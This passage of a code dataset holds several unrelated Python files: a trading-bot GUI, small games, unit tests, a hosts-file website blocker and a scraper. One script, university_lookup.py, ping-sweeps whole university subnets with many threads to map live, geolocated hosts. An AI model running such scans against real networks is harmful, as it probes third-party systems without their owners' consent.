self.add_worker_button.clicked.connect(self.handle_add_worker)\n self.settings_button.clicked.connect(self.handle_open_settings)\n self.help_button.clicked.connect(self.handle_open_documentation)\n self.unlock_wallet_button.clicked.connect(self.handle_login)\n\n # Hide certain buttons by default until login success\n self.add_worker_button.hide()\n\n self.status_bar.showMessage(\"ver {} - Node disconnected\".format(__version__))\n\n QFontDatabase.addApplicationFont(\":/bot_widget/font/SourceSansPro-Bold.ttf\")\n\n def connect_to_bitshares(self):\n # Check if there is already a connection\n if self.config['node']:\n # Test nodes first. This only checks if we're able to connect\n self.status_bar.showMessage('Connecting to Bitshares...')\n try:\n self.main_controller.measure_latency(self.config['node'])\n except NumRetriesReached:\n self.status_bar.showMessage(\n 'ver {} - Coudn\\'t connect to Bitshares. '\n 'Please use different node(s) and retry.'.format(__version__)\n )\n self.main_controller.set_bitshares_instance(None)\n return False\n\n self.main_controller.new_bitshares_instance(self.config['node'])\n self.status_bar.showMessage(self.get_statusbar_message())\n return True\n else:\n # Config has no nodes in it\n self.status_bar.showMessage(\n 'ver {} - Node(s) not found. ' 'Please add node(s) from settings.'.format(__version__)\n )\n return False\n\n @pyqtSlot(name='handle_login')\n def handle_login(self):\n if not self.main_controller.bitshares_instance:\n if not self.connect_to_bitshares():\n return\n\n wallet_controller = WalletController(self.main_controller.bitshares_instance)\n\n if wallet_controller.wallet_created():\n unlock_view = UnlockWalletView(wallet_controller)\n else:\n unlock_view = CreateWalletView(wallet_controller)\n\n if unlock_view.exec_():\n # Hide button once successful wallet creation / login\n self.unlock_wallet_button.hide()\n self.add_worker_button.show()\n\n # Load worker widgets from config file\n workers = self.config.workers_data\n for worker_name in workers:\n self.add_worker_widget(worker_name)\n\n # Limit the max amount of workers so that the performance isn't greatly affected\n if self.num_of_workers >= self.max_workers:\n self.add_worker_button.setEnabled(False)\n break\n\n # Dispatcher polls for events from the workers that are used to change the ui\n self.dispatcher = ThreadDispatcher(self)\n self.dispatcher.start()\n\n self.status_bar.showMessage(\"ver {} - Node delay: - ms\".format(__version__))\n self.status_bar_updater = Thread(target=self._update_statusbar_message)\n self.status_bar_updater.start()\n\n def add_worker_widget(self, worker_name):\n config = self.config.get_worker_config(worker_name)\n widget = WorkerItemWidget(worker_name, config, self.main_controller, self)\n widget.setFixedSize(widget.frameSize())\n self.layout.addWidget(widget)\n self.worker_widgets[worker_name] = widget\n\n # Limit the max amount of workers so that the performance isn't greatly affected\n self.num_of_workers += 1\n if self.num_of_workers >= self.max_workers:\n self.add_worker_button.setEnabled(False)\n\n def remove_worker_widget(self, worker_name):\n self.worker_widgets.pop(worker_name, None)\n\n self.num_of_workers -= 1\n if self.num_of_workers < self.max_workers:\n self.add_worker_button.setEnabled(True)\n\n def change_worker_widget_name(self, old_worker_name, new_worker_name):\n worker_data = self.worker_widgets.pop(old_worker_name)\n self.worker_widgets[new_worker_name] = worker_data\n\n @pyqtSlot(name='handle_add_worker')\n @gui_error\n def handle_add_worker(self):\n create_worker_dialog = CreateWorkerView(self.main_controller.bitshares_instance)\n return_value = create_worker_dialog.exec_()\n\n # User clicked save\n if return_value == 1:\n worker_name = create_worker_dialog.worker_name\n self.main_controller.create_worker(worker_name)\n\n self.config.add_worker_config(worker_name, create_worker_dialog.worker_data)\n self.add_worker_widget(worker_name)\n\n @pyqtSlot(name='handle_open_settings')\n @gui_error\n def handle_open_settings(self):\n settings_dialog = SettingsView()\n reconnect = settings_dialog.exec_()\n\n if reconnect:\n # Reinitialize config after closing the settings window\n self.config = Config()\n self.main_controller.config = self.config\n\n self.connect_to_bitshares()\n\n @staticmethod\n @pyqtSlot(name='handle_open_documentation')\n def handle_open_documentation():\n webbrowser.open('https://github.com/Codaone/DEXBot/wiki')\n\n def set_worker_name(self, worker_name, value):\n self.worker_widgets[worker_name].set_worker_name(value)\n\n def set_worker_account(self, worker_name, value):\n self.worker_widgets[worker_name].set_worker_account(value)\n\n def set_worker_profit(self, worker_name, value):\n self.worker_widgets[worker_name].set_worker_profit(value)\n\n def set_worker_market(self, worker_name, value):\n self.worker_widgets[worker_name].set_worker_market(value)\n\n def set_worker_slider(self, worker_name, value):\n self.worker_widgets[worker_name].set_worker_slider(value)\n\n def customEvent(self, event):\n # Process idle_queue_dispatcher events\n event.callback()\n\n def closeEvent(self, event):\n self.closing = True\n self.status_bar.showMessage(\"Closing app...\")\n if self.status_bar_updater and self.status_bar_updater.is_alive():\n self.status_bar_updater.join()\n\n def _update_statusbar_message(self):\n while not self.closing:\n # When running first time the workers are also interrupting with the connection\n # so we delay the first time to get correct information\n if self.statusbar_updater_first_run:\n self.statusbar_updater_first_run = False\n time.sleep(1)\n\n msg = self.get_statusbar_message()\n idle_add(self.set_statusbar_message, msg)\n runner_count = 0\n # Wait for 30s but do it in 0.5s pieces to not prevent closing the app\n while not self.closing and runner_count < 60:\n runner_count += 1\n time.sleep(0.5)\n\n def get_statusbar_message(self):\n node = self.main_controller.bitshares_instance.rpc.url\n try:\n latency = self.main_controller.measure_latency(node)\n except BaseException:\n latency = -1\n\n if latency != -1:\n return \"ver {} - Node delay: {:.2f}ms - node: {}\".format(__version__, latency, node)\n else:\n return \"ver {} - Node disconnected\".format(__version__)\n\n def set_statusbar_message(self, msg):\n self.status_bar.showMessage(msg)\n\n def set_worker_status(self, worker_name, level, status):\n if worker_name != 'NONE':\n worker = self.worker_widgets.get(worker_name, None)\n if worker:\n worker.set_status(status)\n","sub_path":"dexbot/views/worker_list.py","file_name":"worker_list.py","file_ext":"py","file_size_in_byte":9171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"311832691","text":"import pygame\n\nfrom Abstract.PlayObject import PlayObject\n\n\nclass Block(PlayObject):\n def __init__(self, xpos, ypos):\n super().__init__(xpos, ypos, \"img/block.png\")\n self.speed = -5\n self.speed_increase_step = -1.5\n self.real_speed = self.speed\n self.visible = True\n\n def move(self):\n # if x < 0 then block go down\n if self.x < 0:\n self.y += 40 / (50/abs(self.speed))\n self.x += self.real_speed\n w, h = self.bitmap.get_size()\n w += round(abs(self.speed)+0.5)\n self.bitmap = pygame.transform.scale(self.bitmap, (w, h))\n\n def reset(self):\n self.bitmap = pygame.transform.scale(self.bitmap, (self.w, self.h))\n self.x = 800\n self.y = 360\n self.real_speed = self.speed\n self.visible = True\n\n def increase_speed(self):\n self.speed += self.speed_increase_step\n\n","sub_path":"playobjects/Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"397085144","text":"\"\"\"\nPara sair de um laço while de imediato, sem executar qualquer código\nrestante no laço, independentemente do resultado de qualquer teste\ncondicional, utilize a instrução break. A instrução break direciona o fluxo\nde seu programa; podemos usá-la para controlar quais linhas de código são\nou não são executadas, de modo que o programa execute apenas o código\nque você quiser, quando você quiser.\n\nPor exemplo, considere um programa que pergunte aos usuários os\nnomes de lugares que eles já visitaram. Podemos interromper o laço while\nnesse programa chamando break assim que o usuário fornecer o valor\n'quit':\n\"\"\"\n\nprompt = \"\\nDigite o nome da cidade que você visitou recentemente: \"\nprompt += \"\\n(Digite 'quit' para sair do programa.) \"\n\nwhile True:\n cidade = input(prompt)\n\n if cidade == 'quit':\n break\n else:\n print(\"Eu amo viajar para a(o) \" + cidade.title() + \"!\")","sub_path":"Capitulo 7/cidades.py","file_name":"cidades.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"637418955","text":"#!/usr/bin/env python\n\"\"\"Creates a csv of hosts residing within autonomous systems\n of universities. \n\"\"\"\n\nimport bin_tools\nimport worker_threads\n\nimport subprocess\nfrom queue import Queue, Empty\nfrom threading import Thread\nimport IP2Location\n\ndef create_university_lookup():\n \"\"\"Find university AS, find pingable hosts within AS, then export to csv\"\"\"\n\n uni_AS_dict = get_uni_AS()\n uni_IP_subnet_dict = get_uni_IP_subnet(uni_AS_dict)\n print(\"IPs and subnets found\")\n\n uni_pingable_hosts = find_pingable_hosts(uni_IP_subnet_dict)\n \n uni_pingable_hosts = add_host_location(uni_pingable_hosts)\n \n write_hosts_to_file(uni_pingable_hosts)\n \ndef get_uni_AS():\n \"\"\"Retrieve names of universities and their Autonomous System (AS) number from maxmind.com\"\"\"\n\n # Adapted from https://stackoverflow.com/questions/13332268/python-subprocess-command-with-pipe\n AS_uni_cmd = 'curl -s http://download.maxmind.com/download/geoip/database/asnum/GeoIPASNum2.zip | gunzip | cut -d\",\" -f3 | sed \\'s/\"//g\\' | sort -u | grep \\'University\\\\|College\\''\n AS_uni_proc = subprocess.Popen(AS_uni_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n AS_uni_out = str(AS_uni_proc.communicate()[0])\n\n # Remove leading 'b'\n AS_uni_out = AS_uni_out[1:]\n\n AS_uni_split = AS_uni_out.split(\"\\\\n\")\n\n # Build dict of {university : AS}\n uni_AS_dict = {}\n for AS_uni in AS_uni_split:\n if AS_uni != '\"':\n AS = AS_uni.split(\" \")[0]\n uni_name = ' '.join(AS_uni.split(\" \")[1:])\n uni_AS_dict[uni_name] = AS\n\n return uni_AS_dict\n\ndef get_uni_IP_subnet(uni_AS_dict):\n \"\"\"Leverage 'whois' to get a subnet associated with university AS\"\"\"\n\n uni_IP_subnet_dict = {}\n for uni, AS in iter(uni_AS_dict.items()):\n whois_AS_cmd = 'whois -h whois.radb.net -- \\'-i origin ' + AS + '\\' | grep -Eo \"([0-9.]+){4}/[0-9]+\"'\n whois_AS_proc = subprocess.Popen(whois_AS_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n whois_AS_out = str(whois_AS_proc.communicate()[0])\n\n # Remove leading \"b'\"\n whois_AS_out = whois_AS_out[2:]\n\n whois_AS_first_IP_range = whois_AS_out.split(\"\\\\n\")[0]\n\n if whois_AS_first_IP_range != \"'\":\n uni_IP_subnet_dict[uni] = whois_AS_first_IP_range.split(\"/\")\n\n return uni_IP_subnet_dict\n\ndef find_pingable_hosts(uni_IP_subnet_dict):\n \"\"\"Ping hosts within university subnets to gather hosts that respond to pings\"\"\"\n\n uni_pingable_hosts = {}\n for uni, (subnet, mask) in iter(uni_IP_subnet_dict.items()):\n\n # Get all possible IPv4 addresses within subnet\n subnet_possibilities = get_possible_subnet_addrs(subnet, mask)\n\n # Build a queue of all of the subnet addresses\n queue = Queue()\n for addr in subnet_possibilities:\n queue.put(addr)\n \n # Create threads that accumulate results in pingable_hosts\n end_queue = Queue()\n num_threads = 200\n pingable_hosts = []\n threads = []\n for _ in range(num_threads):\n t = Thread(target=worker_threads.ping_worker_end_if_found, args=(queue, pingable_hosts, end_queue, num_threads))\n t.start()\n threads.append(t)\n\n for thread in threads:\n thread.join()\n\n try:\n hosts_dict = {host : [0, 0] for host, _ in pingable_hosts}\n uni_pingable_hosts[uni] = hosts_dict\n except:\n pass\n \n return uni_pingable_hosts\n\ndef get_possible_subnet_addrs(subnet, mask):\n \"\"\"Get all possible IPv4 addresses within subnet\"\"\"\n\n mask = int(mask)\n \n bin_possibilities = bin_tools.bin_combinations(32 - mask)\n\n # Exclude the first and last addresses of the subnet: x.x.x.0 and x.x.x.255\n # x.x.x.0 is usually not used by convention and x.x.x.255 is reserved for a broadcast address\n bin_possibilities = bin_possibilities[1:-1]\n\n # Get the entire binary representation of all possible subnet IPv4 addresses\n subnet_bin = bin_tools.quad_to_bin_str(subnet)\n subnet_possibilities_bin = []\n for combo in bin_possibilities:\n subnet_possibilities_bin.append(subnet_bin[:mask] + combo)\n\n # Transform binary addresses to IPv4\n subnet_possibilities = [bin_tools.bin_to_dotted_quad(i) for i in subnet_possibilities_bin]\n\n return subnet_possibilities\n\ndef add_host_location(uni_pingable_hosts):\n \"\"\"Add host's latitude and longitude to dictionary\"\"\"\n\n # Open IP2Location binary\n IP2_Loc = IP2Location.IP2Location()\n IP2_Loc.open(\"IP2LOCATION-LITE-DB5.BIN\")\n \n for uni, hosts_dict in iter(uni_pingable_hosts.items()):\n for host, _ in iter(hosts_dict.items()):\n \n record = IP2_Loc.get_all(host) \n if record:\n hosts_dict[host] = [record.latitude, record.longitude]\n else:\n # Delete host that does not have a location\n del hosts_dict[host]\n\n uni_pingable_hosts[uni] = hosts_dict\n\n return uni_pingable_hosts\n\ndef write_hosts_to_file(uni_pingable_hosts):\n \"\"\"Write university host locations to csv\"\"\"\n\n with open('university_hosts.csv', mode='w') as hosts_file:\n # Create csv rows in format 'university, host_addr: latitude longitude'\n pingable_unis = 0\n for uni, hosts in iter(uni_pingable_hosts.items()):\n if hosts:\n host_loc_str = ','\n for addr, loc in iter(hosts.items()):\n host_loc_str += addr + \":\" + ' '.join([str(i) for i in loc]) + \",\"\n\n host_loc_str = host_loc_str[:-1]\n hosts_file.write(uni + host_loc_str + \"\\n\")\n pingable_unis += 1\n\n print(\"{} universities written to csv.\".format(pingable_unis))\n\n\ncreate_university_lookup()","sub_path":"myNet/university_lookup.py","file_name":"university_lookup.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"259700639","text":"# Copyright (C) 2018 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\"\"\"A facade for RestService.\nReasons for a facade:\n* It is not very convenient to use\n* More high level functions are often needed\n\"\"\"\nfrom lib.constants.element import AdminWidgetCustomAttributes\nfrom lib.entities.entities_factory import CustomAttributeDefinitionsFactory\nfrom lib.entities.entity import Representation\nfrom lib.service import rest_service\nfrom lib.utils.string_utils import StringMethods\n\n\ndef create_program():\n \"\"\"Create a program\"\"\"\n return rest_service.ProgramsService().create_objs(count=1)[0]\n\n\ndef create_objective(program=None):\n \"\"\"Create an objecive (optionally map to a `program`).\"\"\"\n objective = rest_service.ObjectivesService().create_objs(count=1)[0]\n if program:\n map_objs(program, objective)\n return objective\n\n\ndef create_control(program=None):\n \"\"\"Create a control (optionally map to a `program`)\"\"\"\n control = rest_service.ControlsService().create_objs(count=1)[0]\n if program:\n map_objs(program, control)\n return control\n\n\ndef create_audit(program):\n \"\"\"Create an audit within a `program`\"\"\"\n return rest_service.AuditsService().create_objs(\n count=1, program=program.__dict__)[0]\n\n\ndef create_asmt_template(audit, **attrs):\n \"\"\"Create assessment template.\"\"\"\n attrs[\"audit\"] = audit.__dict__\n return rest_service.AssessmentTemplatesService().create_objs(\n count=1, **attrs)[0]\n\n\ndef create_asmt_template_w_dropdown(audit, dropdown_types_list):\n \"\"\"Create assessment template with dropdown custom attribute.\"\"\"\n multi_choice_mandatory = {\"file\": \"2\", \"url\": \"4\", \"comment\": \"1\",\n \"file_url\": \"6\", \"url_comment\": \"5\",\n \"file_comment\": \"3\", \"file_url_comment\": \"7\",\n \"nothing\": \"0\"}\n ca_definitions_factory = CustomAttributeDefinitionsFactory()\n custom_attribute_definitions = [ca_definitions_factory.create(\n title=(ca_definitions_factory.generate_ca_title(\n AdminWidgetCustomAttributes.DROPDOWN)),\n attribute_type=AdminWidgetCustomAttributes.DROPDOWN,\n definition_type=AdminWidgetCustomAttributes.DROPDOWN,\n multi_choice_mandatory=(\",\".join(\n multi_choice_mandatory[dropdown_type]\n for dropdown_type in dropdown_types_list)),\n multi_choice_options=(\n StringMethods.random_list_strings(\n list_len=len(dropdown_types_list))))]\n custom_attribute_definitions = (ca_definitions_factory.\n generate_ca_defenitions_for_asmt_tmpls(\n custom_attribute_definitions))\n return create_asmt_template(\n audit, custom_attribute_definitions=custom_attribute_definitions)\n\n\ndef create_asmt_from_template_rest(\n audit, control, asmt_template\n):\n \"\"\"Create new Assessment based on Assessment Template via REST API.\n Return: lib.entities.entity.AssessmentEntity\n \"\"\"\n control_snapshots = [Representation.convert_repr_to_snapshot(\n objs=control, parent_obj=audit)]\n assessments_service = rest_service.AssessmentsFromTemplateService()\n assessments = assessments_service.create_assessments(\n audit=audit,\n template=asmt_template,\n control_snapshots=control_snapshots\n )\n return assessments[0]\n\n\ndef create_assessment(audit, **attrs):\n \"\"\"Create an assessment within an audit `audit`\"\"\"\n attrs[\"audit\"] = audit.__dict__\n return rest_service.AssessmentsService().create_objs(\n count=1, **attrs)[0]\n\n\ndef create_issue(program=None):\n \"\"\"Create a issue (optionally map to a `program`)\"\"\"\n issue = rest_service.IssuesService().create_objs(count=1)[0]\n if program:\n map_objs(program, issue)\n return issue\n\n\ndef map_objs(src_obj, dest_obj):\n \"\"\"Map two objects to each other\"\"\"\n rest_service.RelationshipsService().map_objs(\n src_obj=src_obj, dest_objs=dest_obj)\n\n\ndef get_snapshot(obj, parent_obj):\n \"\"\"Get (or create) a snapshot of `obj` in `parent_obj`\"\"\"\n return rest_service.ObjectsInfoService().get_snapshoted_obj(\n origin_obj=obj, paren_obj=parent_obj)\n\n\ndef map_to_snapshot(src_obj, obj, parent_obj):\n \"\"\"Create a snapshot of `obj` in `parent_obj`.\n Then map `src_obj` to this snapshot.\n \"\"\"\n snapshot = get_snapshot(obj, parent_obj)\n map_objs(src_obj, snapshot)\n","sub_path":"test/selenium/src/lib/service/rest_facade.py","file_name":"rest_facade.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"377730433","text":"#Variables required:\n#one for path of hostfile\n#one for the list of website to be blocked\n#one for loopback ip 127.0.0.1\nfrom datetime import datetime as dt\nimport time\n\n#host_path = r\"C:\\Z Virtual Machines\\Python Code\\Website Blocker\\hosts\"\nhost_path = r\"C:\\Windows\\System32\\drivers\\etc\\hosts\"\nblock_website = [\"www.facebook.com\",\"facebook.com\",\"www.xnxx.com\",\"www.xvideos.com\",\"www.youporn.com\",\"www.pornhub.com\",\"www.pornhum.com\",\"www.indianpornvideos.com\",\"xhamster.com\",\"www.porn300.com\",\"www.kalporn.com\",\"indiasex.org\",\"www.fastindianporn.com\"]\n# this can be included in above list when needed \"www.amazon.in\",\"www.amazon.com\",\"www.flipkart.com\",\"www.snapdeal.com\",\"www.ebay.in\",\"www.ebay.com\"\nloop_back = \"127.0.0.1\"\n#print(dt.now()) print like 2017-10-26 11:49:16.906423\n#print(dt(dt.now().year, dt.now().month, dt.now().day, 8)) #prints like 2017-10-26 08:00:00\n\nwhile True:\n if dt(dt.now().year, dt.now().month, dt.now().day, 17) < dt.now() < dt(dt.now().year, dt.now().month, dt.now().day, 18):\n print(\"Work Hours!!\")\n with open(host_path,\"r+\") as host_file:\n content = host_file.read()\n for website in block_website:\n if website in content:\n pass\n else:\n host_file.write(loop_back + \" \" + website + \"\\n\")\n else:\n print(\"Enjoy! no internet restrictions, Fun Hours!!\")\n with open(host_path,\"r+\") as host_file:\n content = host_file.readlines()\n host_file.seek(0) #moving the cursor at the begining after readline() as it moves cursor to the end of file\n for line in content:\n if not any(website in line for website in block_website): #loops each item in block_website list and comares agains the specific line in content which is holding each line of the hos_file as list\n host_file.write(line) #if those block webside line is found that is ot written\n host_file.truncate() #As the each new line is written above the existing lines in file once for loop finishes all the following or old content is dleeted\n #if host_file.seek(0) wasn't used the truncate will delete nothing as the new lines weree ritten at the nod exisiting lines and after tye new lines are wroitten nothing would eb taher to runcate\n #So for loop above will keep appening the lines again and again in the host_file\n time.sleep(5)\n","sub_path":"Website Blocker/websiteblocker_process.pyw","file_name":"websiteblocker_process.pyw","file_ext":"pyw","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"416524935","text":"import numpy as np\nimport unittest\nimport datetime\nimport funcs\nimport hw5\n\n\nclass TestIsNear(unittest.TestCase):\n def test_is_near(self):\n assert funcs.is_near(5, 2, 1) == False\n assert funcs.is_near(1.5, 2, 1) == True\n assert funcs.is_near(2.5, 2, 1) == True\n\n\nclass TestHourAngle(unittest.TestCase):\n def test_hour_angle_values(self):\n time1 = datetime.time(8, 0, 0)\n time2 = datetime.time(16, 0, 0)\n time3 = datetime.time(8, 33, 0)\n\n omega_expected_1 = -60\n omega_expected_2 = 60\n omega_expected_3 = -51.75\n\n omega1 = funcs.hour_angle(time1)\n omega2 = funcs.hour_angle(time2)\n omega3 = funcs.hour_angle(time3)\n\n assert omega1 - omega_expected_1 == 0\n assert omega2 - omega_expected_2 == 0\n assert omega3 - omega_expected_3 == 0\n\n\nclass TestIncidenceAngle(unittest.TestCase):\n def test_incidence_angle_values(self):\n pass\n\n\nclass TestSolarAzimuthAngle(unittest.TestCase):\n def test_solar_azimuth_angle_values(self):\n omega = 7.35\n thetaz = 9.03\n phi = 29.65\n delta = 23.45\n\n gamma_s_expected = 48.38\n tol = 0.02\n\n gamma_s = funcs.solar_azimuth_angle(omega, thetaz, phi, delta)\n\n assert funcs.is_near(gamma_s, gamma_s_expected, tol)\n\n\nclass TestSolarTime(unittest.TestCase):\n def test_solar_time_values(self):\n pass\n\n\nclass TestZenithAngle(unittest.TestCase):\n def test_zenith_angle_values(self):\n phi = 29.65\n delta = 23.45\n omega = 7.35\n\n thetaz_expected = 9.03\n tol = 0.005\n\n thetaz = funcs.zenith_angle(phi, delta, omega)\n\n assert funcs.is_near(thetaz, thetaz_expected, tol)\n\n# Tests for ray tracing code\nclass TestRayTraceing(unittest.TestCase):\n theta = 5\n f = 2\n # Points to test x1 = -2.5 and x1 = 1.5\n def test_oneD_parabola(self):\n # Create expected values\n y1a_expect = 0.78125\n y1b_expect = 0.28125\n\n # Calculated the values\n y1a = hw5.oneD_parabola(-2.5, self.f)\n y1b = hw5.oneD_parabola(1.5, self.f)\n\n assert y1a - y1a_expect == 0\n assert y1b - y1b_expect == 0\n\n def test_step2(self):\n # Create expected values\n x2a_expect = -2.41284\n x2b_expect = 1.587155\n\n y2a_expect = 1.777444\n y2b_expect = 1.277444\n\n # Calculate the values\n theta = np.radians(self.theta)\n x2a, y2a = hw5.step2(-2.5, 0.78125, theta)\n x2b, y2b = hw5.step2(1.5, 0.28125, theta)\n tol = 0.00001\n\n assert funcs.is_near(x2a_expect, x2a, tol)\n assert funcs.is_near(x2b_expect, x2b, tol)\n assert funcs.is_near(y2a_expect, y2a, tol)\n assert funcs.is_near(y2b_expect, y2b, tol)\n\n def test_step3_twoD(self):\n # Create expected values\n x3a_expect = -1.652\n x3b_expect = 2.436329\n\n y3a_expect = 0.251254\n y3b_expect = 0.632374\n\n # Calculate the values\n x3a, y3a = hw5.step3_twoD(-2.5, 0.78125, 2)\n x3b, y3b = hw5.step3_twoD(1.5, 0.28125, 2)\n tol = 0.001\n\n assert funcs.is_near(x3a_expect, x3a, tol)\n assert funcs.is_near(x3b_expect, x3b, tol)\n assert funcs.is_near(y3a_expect, y3a, tol)\n assert funcs.is_near(y3b_expect, y3b, tol)\n\n # Test that the line is tangent\n assert funcs.is_near((y3a-0.78125)/(x3a+2.5), (-2.5)/(2*self.f), tol)\n assert funcs.is_near((y3b-0.28125)/(x3b-1.5), (1.5)/(2*self.f), tol)\n\n def test_step4(self):\n # Create expected values\n x4a_expect = -1.97\n x4b_expect = 1.148876\n\n y4a_expect = 1.62924\n y4b_expect = 1.21758\n\n # Calculate the values\n x4a, y4a = hw5.step4(-2.5, 0.78125, -1.652, 0.251254)\n x4b, y4b = hw5.step4(1.5, 0.28125, 2.436329, 0.632374)\n tol = 0.0001\n\n assert funcs.is_near(x4a_expect, x4a, tol)\n assert funcs.is_near(x4b_expect, x4b, tol)\n assert funcs.is_near(y4a_expect, y4a, tol)\n assert funcs.is_near(y4b_expect, y4b, tol)\n\n # Test that it is normal to the tangent vector\n dota = ((-1.652 + 2.5)*(-1.97 + 2.5) +\n (0.251254 - 0.78125)*(1.62924 - 0.78125))\n dotb = ((2.436329-1.5)*(1.148876-1.5) +\n (0.632374 - 0.28125)*(1.21758 - 0.28125))\n\n assert funcs.is_near(dota, 0, tol)\n assert funcs.is_near(dotb, 0, tol)\n\n def test_step5(self):\n # Create the expected values\n x5a_expect = -1.6427456\n x5b_expect = 0.7793\n\n y5a_expect = 1.2961\n y5b_expect = 0.9745\n\n # Calculate the values\n x5a, y5a = hw5.step5(-2.5, 0.78125, -2.41284, 1.777444, -1.97, 1.62924)\n x5b, y5b = hw5.step5(1.5, 0.28125, 1.587155, 1.277444, 1.148876, 1.21758)\n tol = 0.001\n\n assert funcs.is_near(x5a_expect, x5a, tol)\n assert funcs.is_near(x5b_expect, x5b, tol)\n assert funcs.is_near(y5a_expect, y5a, tol)\n assert funcs.is_near(y5b_expect, y5b, tol)\n\n def test_plane_intercept(self):\n # Create the expected values\n xa_expect = -0.4707122\n xb_expect = -0.28681\n\n # Calculate the values\n xa = hw5.plane_intercept(-2.5, 0.78125, -1.6427456, 1.2961, 2)\n xb = hw5.plane_intercept(1.5, 0.28125, 0.7793, 0.9745, 2)\n tol = 0.001\n\n assert funcs.is_near(xa_expect, xa, tol)\n assert funcs.is_near(xb_expect, xb, tol)\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"notes/solar_energy_utilization/hw/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"57855665","text":"'''\nCreated on 2018. 8. 30.\n\n@author: sjc\n\n10~1000까지 각 숫자 분해하여 곱하기의 전체 합 구하기\n\n예로, 10~15까지의 각 숫자 분해하여 곱하기의 전체 합은 다음과 같다.\n\n10 = 1 * 0 = 0\n11 = 1 * 1 = 1\n12 = 1 * 2 = 2\n13 = 1 * 3 = 3\n14 = 1 * 4 = 4\n15 = 1 * 5 = 5\n\n그러므로, 이 경우의 답은 0+1+2+3+4+5 = 15\n'''\n\ndef sum():\n a = 0\n c = 1\n for i in range(10, 16): \n b = [int(x) for x in str(i)] \n print(\"b>>>\"+str(b)) \n for x in b:\n c = x * c\n print(\"x>>>\"+str(x)) \n print(\"c>>>\"+str(c)) \n a = a + c\n c = 1\n return a\n \n \nprint(sum())\n\n\n#result = [c * 3 for c in clist if (c % 2) == 1]\n#c = [k for k in word if k not in 'aot']\n\n\n\n\n \n\n","sub_path":"reBasic2018/basic/test/algorism01.py","file_name":"algorism01.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"237500892","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport xlsxwriter\nfrom time import sleep\nimport random\n\n\ndef get_links(html, row):\n soup = BeautifulSoup(html, 'html.parser')\n block_with_items = soup.find(class_='js-catalog_serp')\n items_in_block = block_with_items.find_all(class_='item_table')\n\n for item in items_in_block:\n try:\n title = item.find(class_='item-description-title').find('span')\n title = title.contents[0]\n\n try:\n price = item.find(class_='price')\n price = price.contents[0].lstrip()\n except AttributeError:\n price = ''\n\n try:\n data = item.find(class_='data').find('p')\n data = data.contents[0]\n except AttributeError:\n data = ''\n\n if row == 0:\n worksheet.write(row, 0, 'Название')\n worksheet.write(row, 1, 'Зарплата')\n worksheet.write(row, 2, 'Информация')\n else:\n worksheet.write(row, 0, title)\n worksheet.write(row, 1, price)\n worksheet.write(row, 2, data)\n row += 1\n print(title)\n except Exception as e:\n print(e)\n return row\n\n\ndef get_html(url):\n response = requests.get(url)\n return response.text\n\n\ndef get_last_page(paginator):\n print(paginator)\n all_pages = paginator.find_all(class_='pagination-page')\n for item in all_pages:\n if item.get_text() == 'Последняя':\n last = item.get('href')\n pattern = '\\d+$'\n last = re.findall(pattern, last)[0]\n return last\n\n\ndef get_paginator(html, url):\n soup = BeautifulSoup(html, 'html.parser')\n last_page = get_last_page(soup.find(class_='pagination-pages'))\n\n pages = []\n for page in range(1, int(last_page) + 1):\n pages.append(f'{url}?p={page}')\n return pages\n\n\nmain_url = 'https://www.avito.ru/sankt-peterburg/rezume/fitnes_salony_krasoty'\npages = get_paginator(get_html(main_url), main_url)\n\nworkbook = xlsxwriter.Workbook('Expenses01.xlsx')\nworksheet = workbook.add_worksheet()\nrow = 0\n\nfor page in pages:\n print(page)\n row = get_links(get_html(page), row)\n\nworkbook.close()\n","sub_path":"avito_parser.py","file_name":"avito_parser.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"235970867","text":"# -*- coding: utf-8 -*-\n\n# Nicolas, 2015-11-18\n# modifié par Laura Nguyen et Fatemeh Hamissi\n\nfrom __future__ import absolute_import, print_function, unicode_literals\nfrom gameclass import Game,check_init_game_done\nfrom spritebuilder import SpriteBuilder\nfrom players import Player\nfrom sprite import MovingSprite\nfrom ontology import Ontology\nfrom itertools import chain\nimport pygame\nimport glo\n\nimport random \nimport numpy as np\nimport sys\n\n\nfrom grid2D import *\n \n# ---- ---- ---- ---- ---- ----\n# ---- Main ----\n# ---- ---- ---- ---- ---- ----\n\ngame = Game()\n\n\ndef init(_boardname=None):\n global player,game\n # pathfindingWorld_MultiPlayer4\n name = _boardname if _boardname is not None else 'tictactoeBis'\n game = Game('Cartes/' + name + '.json', SpriteBuilder)\n game.O = Ontology(True, 'SpriteSheet-32x32/tiny_spritesheet_ontology.csv')\n game.populate_sprite_names(game.O)\n game.fps = 5 # frames per second\n game.mainiteration()\n game.mask.allow_overlaping_players = True\n #player = game.player\n\ndef ajout_successeurs(state, successeurs,terrains_jeu):\n (i,j)=state[-1]\n #si c'est une cas libre\n for case in terrains_jeu[j]:\n if case == 0:\n a=terrains_jeu[j].index(case)\n successeurs[state].append((a,j))\n return successeurs\n \n''' \n# détermine si c'est une position qui va nous faire gagner\ndef pos_gagne(state,terrains_jeu,player):\n i,j=state[-1]\n 